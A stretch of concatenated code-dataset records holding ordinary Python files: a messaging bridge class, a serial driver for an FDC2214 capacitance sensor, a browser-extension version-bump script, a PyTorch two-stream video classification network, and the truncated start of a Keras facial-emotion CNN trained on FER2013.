return\n\n if hasattr(bulk, 'read'):\n bulk = msgpack.unpack(bulk)\n\n if not isinstance(bulk, list):\n bulk = [bulk]\n\n if isinstance(bulk[0], dict) and 'arg' in bulk[0]:\n bulk = [e['arg'] for e in bulk]\n\n if isinstance(bulk[0], dict) and 'uid' in bulk[0]:\n for e in bulk:\n log.debug(\"%s: %s [%s]\", token, e['uid'], e.get('state'))\n else:\n for e in bulk:\n log.debug(\"%s: ?\", str(token))\n log.debug(\"%s: %s\", token, str(e)[0:32])\n\n\n# ------------------------------------------------------------------------------\n#\nclass Bridge(object):\n '''\n\n A bridge can be configured to have a finite lifetime: when no messages are\n received in `timeout` seconds, the bridge process will terminate.\n '''\n\n # --------------------------------------------------------------------------\n #\n def __init__(self, cfg):\n\n self._cfg = cfg\n self._channel = self._cfg.channel\n self._uid = self._cfg.uid\n self._log = Logger(name=self._uid, ns='radical.utils',\n level='DEBUG', path=self._cfg.path)\n self._prof = Profiler(name=self._uid, path=self._cfg.path)\n\n self._prof.prof('init3', uid=self._uid, msg=self._cfg.path)\n self._log.debug('bridge %s init', self._uid)\n\n self._bridge_initialize()\n\n\n # --------------------------------------------------------------------------\n #\n @property\n def channel(self):\n return self._channel\n\n\n # --------------------------------------------------------------------------\n #\n def start(self):\n\n # the bridge runs in a thread. It is the bridge's owner process'\n # responsibility to ensure the thread is seeing suffient time to perform\n # as needed. Given Python's thread performance (or lack thereof), this\n # basically means that the user of this class should create a separate\n # process instance to host the bridge thread.\n self._term = mt.Event()\n self._bridge_thread = mt.Thread(target=self._bridge_work)\n self._bridge_thread.daemon = True\n self._bridge_thread.start()\n\n self._log.info('started bridge %s', self._uid)\n\n\n # --------------------------------------------------------------------------\n #\n @staticmethod\n def create(cfg):\n\n # NOTE: I'd rather have this as class data than as stack data, but\n # python stumbles over circular imports at that point :/\n # Another option though is to discover and dynamically load\n # components.\n from .pubsub import PubSub\n from .queue import Queue\n\n _btypemap = {'pubsub' : PubSub,\n 'queue' : Queue}\n\n kind = cfg['kind']\n\n if kind not in _btypemap:\n raise ValueError('unknown bridge type (%s)' % kind)\n\n btype = _btypemap[kind]\n bridge = btype(cfg)\n\n return bridge\n\n\n # --------------------------------------------------------------------------\n #\n def stop(self, timeout=None):\n\n self._term.set()\n # self._bridge_thread.join(timeout=timeout)\n self._prof.prof('term', uid=self._uid)\n\n # if timeout is not None:\n # return not self._bridge_thread.is_alive()\n\n\n # --------------------------------------------------------------------------\n #\n @property\n def alive(self):\n return self._bridge_thread.is_alive()\n\n\n# ------------------------------------------------------------------------------\n\n","sub_path":"src/radical/utils/zmq/bridge.py","file_name":"bridge.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"216165260","text":"# ===============================================\n# Driver for FDC2214 capacitance to digital module\n# (c) 2017 Mihkel Veske\n# ===============================================\n\nimport serial\nimport time\nimport numpy as np\n\nimport constants as const\nimport tools\n\n#===========================================================\n# USB CDC commands\nWRITE = '36'\nREAD = '37'\nSTREAM_ON = '32'\nSTREAM_OFF = '33'\nFIRMWARE ='4C'\n\n#===========================================================\n# FDC2214 addressing space\nDataMSB_CH0 = '00'\nDataLSB_CH0 = '01'\nDataMSB_CH1 = '02'\nDataLSB_CH1 = '03'\nDataMSB_CH2 = '04'\nDataLSB_CH2 = '05'\nDataMSB_CH3 = '06'\nDataLSB_CH3 = '07'\n\nRcount_CH0 = '08'\nRcount_CH1 = '09'\nRcount_CH2 = '0A'\nRcount_CH3 = '0B'\nOffset_CH0 = '0C'\nOffset_CH1 = '0D'\nOffset_CH2 = '0E'\nOffset_CH3 = '0F'\nSetCount_CH0 = '10'\nSetCount_CH1 = '11'\nSetCount_CH2 = '12'\nSetCount_CH3 = '13'\nClockDiv_CH0 = '14'\nClockDiv_CH1 = '15'\nClockDiv_CH2 = '16'\nClockDiv_CH3 = '17'\nDriveCur_CH0 = '1E'\nDriveCur_CH1 = '1F'\nDriveCur_CH2 = '20'\nDriveCur_CH3 = '21'\n\nStatus = '18'\nErrorConfig = '19'\nConfig = '1A'\nMuxConfig = '1B'\nReset = '1C'\nDevID = '7F'\n\n#===========================================================\n# FDC2214 internal variables\nserial_port = serial.Serial()\n\n#===========================================================\n\n# convert raw measurement data into capacitance\n# sensor capacitance C_sensor = 1 / L*(2*pi*f_sensor)^2 - C \n# and sensor frequency f_sensor = data * f_ref / 2^28\ndef data2cap(data):\n f_ref = 40.0 # reference frequency [MHz]\n C = 33.0 # parallel sensor capacitance [pF]\n L = 18.0 # parallel sensor inductance [uH]\n \n reading = int(data, 16) # convert hex string to decimal integer \n f_sensor = reading * f_ref / 2**28 # sensor frequency [MHz]\n C_sensor = 0.0 # sensor capacitance [pF]\n if f_sensor > 0: C_sensor = 1e6 / (L * (2*np.pi*f_sensor)**2) - C \n return round(C_sensor, 3)\n\n# read the capacitance in channel 0\ndef read_ch0():\n [C0, C1, C2, C3] = get_data()\n return C0;\n\n# read the capacitance in channel 1\ndef read_ch1():\n [C0, C1, C2, C3] = get_data()\n return C1;\n\n# read the capacitance difference between channel 1 and channel 0\ndef read_ch10():\n [C0, C1, C2, C3] = get_data()\n return C1 - C0;\n \n# read the capacitance difference in channel 2\ndef read_ch2():\n [C0, C1, C2, C3] = get_data()\n return C3 - C2;\n \n# read measured capacitances\ndef get_data():\n global serial_port\n \n send_data = '1000'\n send_data=str(send_data)\n if (const.PRINT_TX_DATA):\n print (\"Sent:\", send_data)\n \n try:\n # Read pending input bytes\n #while (serial_port.inWaiting() > 0):\n # serial_port.read(serial_port.inWaiting())\n\n # Send data\n #serial_port.write(send_data.encode(\"utf-8\"))\n \n # wait for the response\n #while (serial_port.inWaiting() < 32): time.sleep(0.1)\n time.sleep(0.01)\n \n # read the response\n # response = serial_port.read(serial_port.inWaiting())\n if (const.PRINT_RESPONSE_DATA):\n print (\"Response:\", end='')\n for r in response: print (\" %d\" % r, end='')\n print()\n \n # convert readings in hex string format into integers\n if len(response) >= 36:\n return [data2cap(response[0:8]), data2cap(response[9:17]),\n data2cap(response[18:26]), data2cap(response[27:35])]\n\n except serial.SerialException:\n print (\"Error writing to FDC2214 in\", serial_port.port)\n\n return [0,0,0,0]\n\n# open serial port and initialise FDC2214 registers\ndef config():\n global serial_port\n \n # open serial port\n serial_port = tools.get_serial(const.FDC2214_PORT, 115200);\n #if (not serial_port.isOpen()):\n # serial_port.open()\n \n #return\n\n# write data string \ndef write_data(data):\n global serial_port\n \n if (const.PRINT_TX_DATA):\n print (\"Sent:\", data)\n \n try:\n # Read pending input bytes\n while (serial_port.inWaiting() > 0):\n serial_port.read(serial_port.inWaiting())\n\n # Send data\n serial_port.write(data.encode(\"utf-8\"))\n \n # wait for the response\n while (serial_port.inWaiting() < 32):\n time.sleep(0.1)\n \n # read the response\n response = serial_port.read(serial_port.inWaiting())\n if (const.PRINT_RESPONSE_DATA):\n print (\"Response:\", end='')\n for r in response: print (\" %d\" % r, end='')\n print()\n return response[8];\n\n except serial.SerialException:\n print (\"Error writing to FDC2214 in\", serial_port.port)\n \n return 0\n\n# read value from register\ndef read_reg(reg):\n send_data = LDC_READ + reg + '00'\n return write_data(send_data);\n \n# write value to register\ndef write_reg(reg, write_data):\n send_data = LDC_WRITE + reg + write_data + '00'\n write_data(send_data);\n","sub_path":"머신러닝 공부/LG_current_detection/science-basement-d2d1d7809855b0fc99c386628562acd3e71757b0/fdc2214.py","file_name":"fdc2214.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"38995249","text":"#!/usr/bin/python\n\nfrom crx_builder.crx_versioner import CrxVersioner\nimport argparse\nimport logging\n\nlogging.basicConfig(level='INFO')\n\n# Grab the args, which should only be the directory to pack, and the location of the updates file\nparser = argparse.ArgumentParser()\nparser.add_argument('--app_path', type=str, help='Enter the path to the extension', required=True)\nparser.add_argument('--pem_file_location', type=str, help='Enter the path to the pem file', required=True)\nparser.add_argument('--update_file', type=str, help='Enter the path to the update file', required=True)\nargs = parser.parse_args()\n\nversioner = CrxVersioner(\n args.app_path,\n args.pem_file_location,\n args.update_file\n)\n \nversioner.bump_version()\n\n","sub_path":"bump_version.py","file_name":"bump_version.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"88585238","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nimport torch\nimport torch.nn as nn\nfrom torchvision.models.utils import load_state_dict_from_url\nfrom torch.nn import functional as F\n\n# TODO like slowfast ,cat the two pathways avg layer,and fc forward togother\nmodel_urls = {\n 'r3d_18': 'https://download.pytorch.org/models/r3d_18-b3b3357e.pth',\n 'mc3_18': 'https://download.pytorch.org/models/mc3_18-a90a0ba3.pth',\n 'r2plus1d_18': 'https://download.pytorch.org/models/r2plus1d_18-91a641e6.pth',\n}\n\n\nclass Conv2Plus1D(nn.Sequential):\n\n def __init__(self,\n in_planes,\n out_planes,\n midplanes,\n stride=1,\n padding=1):\n super(Conv2Plus1D, self).__init__(\n nn.Conv3d(in_planes, midplanes, kernel_size=(1, 3, 3),\n stride=(1, stride, stride), padding=(0, padding, padding),\n bias=False),\n nn.BatchNorm3d(midplanes),\n nn.ReLU(inplace=True),\n nn.Conv3d(midplanes, out_planes, kernel_size=(3, 1, 1),\n stride=(stride, 1, 1), padding=(padding, 0, 0),\n bias=False))\n\n @staticmethod\n def get_downsample_stride(stride):\n return (stride, stride, stride)\n\n\nclass BasicConv2d(nn.Module):\n\n def __init__(self, in_channels, out_channels, **kwargs):\n super(BasicConv2d, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)\n self.bn = nn.BatchNorm2d(out_channels, eps=0.001)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n return F.relu(x, inplace=True)\n\n\nclass InceptionA(nn.Module):\n\n def __init__(self, in_channels, output_channels, stride, conv_block=None, ):\n super(InceptionA, self).__init__()\n if conv_block is None:\n conv_block = BasicConv2d\n channels_chunk = int(output_channels) // 8\n self.stride = stride\n self.branch1x1 = conv_block(in_channels, channels_chunk, kernel_size=1, stride=stride)\n\n self.branch5x5_1 = conv_block(in_channels, channels_chunk, kernel_size=1)\n self.branch5x5_2 = conv_block(channels_chunk, channels_chunk * 4, kernel_size=5, stride=stride, padding=2)\n\n self.branch3x3dbl_1 = conv_block(in_channels, channels_chunk, kernel_size=1)\n self.branch3x3dbl_2 = conv_block(channels_chunk, channels_chunk * 2, kernel_size=3, padding=1)\n self.branch3x3dbl_3 = conv_block(channels_chunk * 2, channels_chunk * 2, kernel_size=3, stride=stride,\n padding=1)\n\n self.branch_pool = conv_block(in_channels, channels_chunk, kernel_size=1, stride=stride)\n\n def _forward(self, x):\n branch1x1 = self.branch1x1(x)\n\n branch5x5 = self.branch5x5_1(x)\n branch5x5 = self.branch5x5_2(branch5x5)\n\n branch3x3dbl = self.branch3x3dbl_1(x)\n branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)\n branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)\n\n branch_pool = F.avg_pool2d(x, kernel_size=3, stride=1, padding=1)\n branch_pool = self.branch_pool(branch_pool)\n\n outputs = [branch1x1, branch5x5, branch3x3dbl, branch_pool]\n return outputs\n\n def forward(self, x):\n outputs = self._forward(x)\n return torch.cat(outputs, 1)\n\n\nclass Timeception(nn.Module):\n '''\n keep temporal scale same\n '''\n\n def __init__(self, in_channels, out_channels, stride):\n super(Timeception, self).__init__()\n self.branch1 = nn.Conv1d(in_channels, out_channels, kernel_size=1, stride=stride)\n self.branch3 = nn.Conv1d(in_channels, out_channels, kernel_size=3, stride=stride, padding=1)\n self.branch5 = nn.Conv1d(in_channels, out_channels, kernel_size=5, stride=stride, padding=2)\n self.conv1 = nn.Conv1d(3 * out_channels, out_channels, kernel_size=1)\n\n def forward(self, x):\n # x (-1,c,t)\n x1 = self.branch1(x)\n x3 = self.branch3(x)\n x5 = self.branch5(x)\n x = torch.cat((x1, x3, x5), dim=1)\n x = self.conv1(x)\n return x\n\n\nclass Conv2Plus1DSpatioalEnhanced(nn.Module):\n\n def __init__(self,\n in_planes,\n out_planes,\n midplanes,\n stride=1,\n padding=1):\n super(Conv2Plus1DSpatioalEnhanced, self).__init__()\n self.inception = InceptionA(in_planes, out_planes, stride=stride, conv_block=BasicConv2d)\n self.bn3 = nn.BatchNorm3d(out_planes)\n self.temp_cov = nn.Conv3d(out_planes, out_planes, kernel_size=(3, 1, 1), stride=(stride, 1, 1),\n padding=(padding, 0, 0), bias=False)\n\n def forward(self, x):\n '''\n :param x: (N, C, T, W, H)\n :return:\n '''\n n, c, t, w, h = x.shape\n x = x.view(-1, c, w, h)\n x = self.inception(x)\n x = x.view(n, x.shape[1], -1, x.shape[2], x.shape[3])\n x = self.bn3(x)\n x = F.relu(x, inplace=True)\n x = self.temp_cov(x)\n return x\n\n @staticmethod\n def get_downsample_stride(stride):\n return (stride, stride, stride)\n\n\nclass Conv2Plus1DTemporalEnhanced(nn.Module):\n\n def __init__(self,\n in_planes,\n out_planes,\n midplanes,\n stride=1,\n padding=1):\n super(Conv2Plus1DTemporalEnhanced, self).__init__()\n self.spatioal_cov = nn.Conv3d(in_planes, out_planes, kernel_size=(1, 3, 3), stride=(1, stride, stride),\n padding=(0, padding, padding), bias=False)\n self.bn3 = nn.BatchNorm3d(out_planes)\n self.timeception = Timeception(out_planes, out_planes, stride)\n\n def forward(self, x):\n '''\n :param x: (B, C, T, W, H)\n :return:\n '''\n x = self.spatioal_cov(x)\n x = self.bn3(x)\n x = F.relu(x, inplace=True)\n b, c, t, w, h = x.shape\n x = x.permute(0, 3, 4, 1, 2) # (None, 7, 7, 1024, 20)\n x = x.contiguous()\n x = x.view(-1, c, t) # (None*7*7, 1024, 20)\n x = self.timeception(x)\n x = x.view(b, w, h, c, -1) # (None, 7, 7, 1024, 20)\n x = x.permute(0, 3, 4, 1, 2) # (None, 1024, 20, 7, 7)\n return x\n\n @staticmethod\n def get_downsample_stride(stride):\n return (stride, stride, stride)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, conv_builder, stride=1, downsample=None):\n midplanes = (inplanes * planes * 3 * 3 * 3) // (inplanes * 3 * 3 + 3 * planes)\n\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Sequential(\n conv_builder(inplanes, planes, midplanes, stride),\n nn.BatchNorm3d(planes),\n nn.ReLU(inplace=True)\n )\n self.conv2 = nn.Sequential(\n conv_builder(planes, planes, midplanes),\n nn.BatchNorm3d(planes)\n )\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.conv2(out)\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, conv_builder, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n midplanes = (inplanes * planes * 3 * 3 * 3) // (inplanes * 3 * 3 + 3 * planes)\n\n # 1x1x1\n self.conv1 = nn.Sequential(\n nn.Conv3d(inplanes, planes, kernel_size=1, bias=False),\n nn.BatchNorm3d(planes),\n nn.ReLU(inplace=True)\n )\n # Second kernel\n self.conv2 = nn.Sequential(\n conv_builder(planes, planes, midplanes, stride),\n nn.BatchNorm3d(planes),\n nn.ReLU(inplace=True)\n )\n\n # 1x1x1\n self.conv3 = nn.Sequential(\n nn.Conv3d(planes, planes * self.expansion, kernel_size=1, bias=False),\n nn.BatchNorm3d(planes * self.expansion)\n )\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.conv2(out)\n out = self.conv3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass BasicStem(nn.Sequential):\n \"\"\"The default conv-batchnorm-relu stem\n \"\"\"\n\n def __init__(self):\n super(BasicStem, self).__init__(\n nn.Conv3d(3, 64, kernel_size=(3, 7, 7), stride=(1, 2, 2),\n padding=(1, 3, 3), bias=False),\n nn.BatchNorm3d(64),\n nn.ReLU(inplace=True))\n\n\nclass R2Plus1dStem(nn.Sequential):\n \"\"\"R(2+1)D stem is different than the default one as it uses separated 3D convolution\n \"\"\"\n\n def __init__(self):\n super(R2Plus1dStem, self).__init__(\n nn.Conv3d(3, 45, kernel_size=(1, 7, 7),\n stride=(1, 2, 2), padding=(0, 3, 3),\n bias=False),\n nn.BatchNorm3d(45),\n nn.ReLU(inplace=True),\n nn.Conv3d(45, 64, kernel_size=(3, 1, 1),\n stride=(1, 1, 1), padding=(1, 0, 0),\n bias=False),\n nn.BatchNorm3d(64),\n nn.ReLU(inplace=True))\n\n\nclass MSLT(nn.Module):\n\n def __init__(self, pretrained=False, progress=True, block=BasicBlock,\n conv_makers=[Conv2Plus1D] * 3 + [Conv2Plus1DSpatioalEnhanced] * 1,\n layers=[3, 4, 6, 3],\n stem=R2Plus1dStem, input_channels=3, num_classes=400, dropout=0.5,\n zero_init_residual=False):\n \"\"\"Generic resnet video generator.\n\n Args:\n block (nn.Module): resnet building block\n conv_makers (list(functions)): generator function for each layer\n layers (List[int]): number of blocks per layer\n stem (nn.Module, optional): Resnet stem, if None, defaults to conv-bn-relu. Defaults to None.\n num_classes (int, optional): Dimension of the final FC layer. Defaults to 400.\n zero_init_residual (bool, optional): Zero init bottleneck residual BN. Defaults to False.\n \"\"\"\n super(MSLT, self).__init__()\n self.inplanes = 64\n\n self.stem = stem()\n\n self.layer1 = self._make_layer(block, conv_makers[0], 64, layers[0], stride=1)\n self.layer2 = self._make_layer(block, conv_makers[1], 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, conv_makers[2], 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, conv_makers[3], 512, layers[3], stride=2)\n\n self.avgpool = nn.AdaptiveAvgPool3d((1, 1, 1))\n self.dp = nn.Dropout(dropout)\n self.fc_layer = nn.Linear(512 * block.expansion * 2, num_classes)\n\n self.fusion1 = nn.MaxPool3d(kernel_size=(3, 1, 1), stride=(2, 1, 1), padding=(1, 0, 0))\n self.fusion2 = nn.MaxPool3d(kernel_size=(3, 1, 1), stride=(2, 1, 1), padding=(1, 0, 0))\n\n # init weights\n self._initialize_weights()\n\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n\n if pretrained:\n state_dict = load_state_dict_from_url(model_urls['r2plus1d_18'],\n progress=progress)\n\n model_dict = self.state_dict()\n pretrained_dict = {k: v for k, v in state_dict.items() if k in model_dict}\n model_dict.update(pretrained_dict)\n self.load_state_dict(pretrained_dict, strict=False)\n\n if input_channels != 3:\n self.stem[0] = nn.Conv3d(input_channels, 45, kernel_size=(1, 7, 7), stride=(1, 2, 2), padding=(0, 3, 3),\n bias=True)\n\n def forward(self, x, stream):\n\n layer3_feature, layer4_feature, feature_vector = stream\n x = self.stem(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n\n x = self.layer3(x)\n x = x + self.fusion1(layer3_feature)\n\n x = self.layer4(x)\n x = x+ self.fusion2(layer4_feature)\n\n x = self.avgpool(x)\n # Flatten the layer to fc\n x = x.flatten(1)\n x = torch.cat([x, feature_vector], dim=1)\n x = self.dp(x)\n x = self.fc_layer(x)\n\n return x\n\n def _make_layer(self, block, conv_builder, planes, blocks, stride=1):\n downsample = None\n\n if stride != 1 or self.inplanes != planes * block.expansion:\n ds_stride = conv_builder.get_downsample_stride(stride)\n downsample = nn.Sequential(\n nn.Conv3d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=ds_stride, bias=False),\n nn.BatchNorm3d(planes * block.expansion)\n )\n layers = []\n layers.append(block(self.inplanes, planes, conv_builder, stride, downsample))\n\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes, conv_builder))\n\n return nn.Sequential(*layers)\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv3d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out',\n nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out',\n nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Conv1d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out',\n nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm3d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, 0, 0.01)\n nn.init.constant_(m.bias, 0)\n\n\nclass LSMT(nn.Module):\n\n def __init__(self, pretrained=True, progress=True, block=BasicBlock,\n conv_makers=[Conv2Plus1D] * 3 + [Conv2Plus1DTemporalEnhanced] * 1,\n layers=[3, 4, 6, 3],\n stem=R2Plus1dStem, input_channels=3, num_classes=400,\n zero_init_residual=False):\n \"\"\"Generic resnet video generator.\n\n Args:\n block (nn.Module): resnet building block\n conv_makers (list(functions)): generator function for each layer\n layers (List[int]): number of blocks per layer\n stem (nn.Module, optional): Resnet stem, if None, defaults to conv-bn-relu. Defaults to None.\n num_classes (int, optional): Dimension of the final FC layer. Defaults to 400.\n zero_init_residual (bool, optional): Zero init bottleneck residual BN. Defaults to False.\n \"\"\"\n super(LSMT, self).__init__()\n self.inplanes = 64\n\n self.stem = stem()\n\n self.layer1 = self._make_layer(block, conv_makers[0], 64, layers[0], stride=1)\n self.layer2 = self._make_layer(block, conv_makers[1], 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, conv_makers[2], 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, conv_makers[3], 512, layers[3], stride=2)\n\n self.avgpool = nn.AdaptiveAvgPool3d((1, 1, 1))\n self.fc_layer = nn.Linear(512 * block.expansion, num_classes)\n\n # init weights\n self._initialize_weights()\n\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n\n if pretrained:\n state_dict = load_state_dict_from_url(model_urls['r2plus1d_18'],\n progress=progress)\n\n model_dict = self.state_dict()\n pretrained_dict = {k: v for k, v in state_dict.items() if k in model_dict}\n model_dict.update(pretrained_dict)\n self.load_state_dict(pretrained_dict, strict=False)\n\n if input_channels != 3:\n self.stem[0] = nn.Conv3d(input_channels, 45, kernel_size=(1, 7, 7), stride=(1, 2, 2), padding=(0, 3, 3),\n bias=True)\n\n def forward(self, x):\n x = self.stem(x)\n\n x = self.layer1(x)\n layer1_feature = x\n\n x = self.layer2(x)\n layer2_feature = x\n\n x = self.layer3(x)\n layer3_feature = x\n\n x = self.layer4(x)\n layer4_feature = x\n\n x = self.avgpool(x)\n # Flatten the layer to fc\n feature_vector = x.flatten(1)\n # score = self.fc_layer(x)\n\n return layer1_feature, layer2_feature, layer3_feature, layer4_feature, feature_vector\n\n def _make_layer(self, block, conv_builder, planes, blocks, stride=1):\n downsample = None\n\n if stride != 1 or self.inplanes != planes * block.expansion:\n ds_stride = conv_builder.get_downsample_stride(stride)\n downsample = nn.Sequential(\n nn.Conv3d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=ds_stride, bias=False),\n nn.BatchNorm3d(planes * block.expansion)\n )\n layers = []\n layers.append(block(self.inplanes, planes, conv_builder, stride, downsample))\n\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes, conv_builder))\n\n return nn.Sequential(*layers)\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv3d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out',\n nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out',\n nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Conv1d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out',\n nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm3d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, 0, 0.01)\n nn.init.constant_(m.bias, 0)\n\n\nclass MSTN(nn.Module): # multi-scale spational and temporal network\n def __init__(self, n_classes):\n super(MSTN, self).__init__()\n self.mslt = MSLT(num_classes=n_classes, input_channels=3)\n self.lsmt = LSMT(num_classes=n_classes, input_channels=2)\n\n def forward(self, x):\n # x: (iframe, mv)\n iframe, mv = x\n _, _, layer3_feature, layer4_feature, feature_vector = self.lsmt(mv)\n score = self.mslt(iframe, (layer3_feature, layer4_feature, feature_vector))\n return score\n\n\nif __name__ == \"__main__\":\n num_classes = 101\n # mv sample 2x iframe\n iframe = torch.rand(4, 3, 5, 224, 224)\n mv = torch.rand(4, 2, 10, 224, 224)\n # mslt = R2Plus1d(num_classes=101)\n # devices = [torch.device(\"cuda:%d\" % device) for device in [0, 1]]\n # model = torch.nn.DataParallel(mslt, device_ids=[0, 1])\n # model = model.to(devices[0])\n # output = model(iframe)\n # print(output.size())\n #\n mtls = MSTN(n_classes=num_classes)\n devices = [torch.device(\"cuda:%d\" % device) for device in [4, 5]]\n model = torch.nn.DataParallel(mtls, device_ids=[4, 5])\n model = model.to(devices[0])\n output = model((iframe, mv))\n print(output.size())\n","sub_path":"mstn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":20616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"614169314","text":"from __future__ import print_function\r\nimport keras\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Activation, Flatten, BatchNormalization, Convolution2D\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nimport os\r\nfrom keras.models import Sequential\r\nfrom keras.regularizers import l2\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\r\nfrom keras.layers.advanced_activations import ELU\r\nfrom keras.layers.core import Activation, Flatten, Dropout, Dense\r\nfrom keras.optimizers import RMSprop, SGD, Adam\r\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau, TensorBoard\r\nfrom keras.losses import categorical_crossentropy\r\nfrom keras import regularizers\r\nfrom keras.regularizers import l1\r\nimport pandas as pd\r\nimport numpy as np\r\nimport csv\r\nimport cv2\r\n\r\nwidth, height = 48, 48\r\nimage_size = (width, height)\r\nnum_features = 64\r\nnum_labels = 7\r\nbatch_size = 64\r\nepochs = 100\r\nMODELPATH = './models/model.h5'\r\n\r\ndef process_csv_file(data):\r\n pixels = data['pixels'].tolist()\r\n width, height = 48, 48\r\n faces = []\r\n for pixel_sequence in pixels:\r\n face = [int(pixel) for pixel in pixel_sequence.split(' ')]\r\n face = np.asarray(face).reshape(width, height)\r\n face = cv2.resize(face.astype('uint8'), image_size)\r\n faces.append(face.astype('float32'))\r\n faces = np.asarray(faces)\r\n faces = np.expand_dims(faces, -1)\r\n emotions = pd.get_dummies(data['emotion']).as_matrix()\r\n return faces, emotions\r\n\r\ndataset_df = pd.read_csv(\"./dataset/fer2013.csv\")\r\n\r\nmask_training = (dataset_df['Usage']==\"Training\")\r\nmask_test = (dataset_df['Usage']==\"PublicTest\")\r\nmask_valid = (dataset_df['Usage']==\"PrivateTest\")\r\n\r\ntrain_raw = dataset_df.loc[mask_training].reset_index(drop=True)\r\ntest_raw = dataset_df.loc[mask_test].reset_index(drop=True)\r\nvalid_raw = dataset_df.loc[mask_valid].reset_index(drop=True)\r\n\r\nX_train, y_train = process_csv_file(train_raw)\r\nX_test, y_test = process_csv_file(test_raw)\r\nX_valid, y_valid = process_csv_file(valid_raw)\r\n\r\nmodel = Sequential()\r\nmodel.add(Convolution2D(filters=16, kernel_size=(5, 5), padding='same',\r\n name='image_array', input_shape=(width,height,1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Convolution2D(filters=16, kernel_size=(5, 5),\r\n strides=(2, 2), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dropout(.25))\r\n\r\nmodel.add(Convolution2D(filters=32, kernel_size=(5, 5), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Convolution2D(filters=32, kernel_size=(5, 5),\r\n strides=(2, 2), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dropout(.25))\r\n\r\nmodel.add(Convolution2D(filters=64, kernel_size=(3, 3), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Convolution2D(filters=64, kernel_size=(3, 3),\r\n strides=(2, 2), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dropout(.25))\r\n\r\nmodel.add(Convolution2D(filters=64, kernel_size=(1, 1), padding='same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Convolution2D(filters=128, kernel_size=(3, 3),\r\n strides=(2, 2), 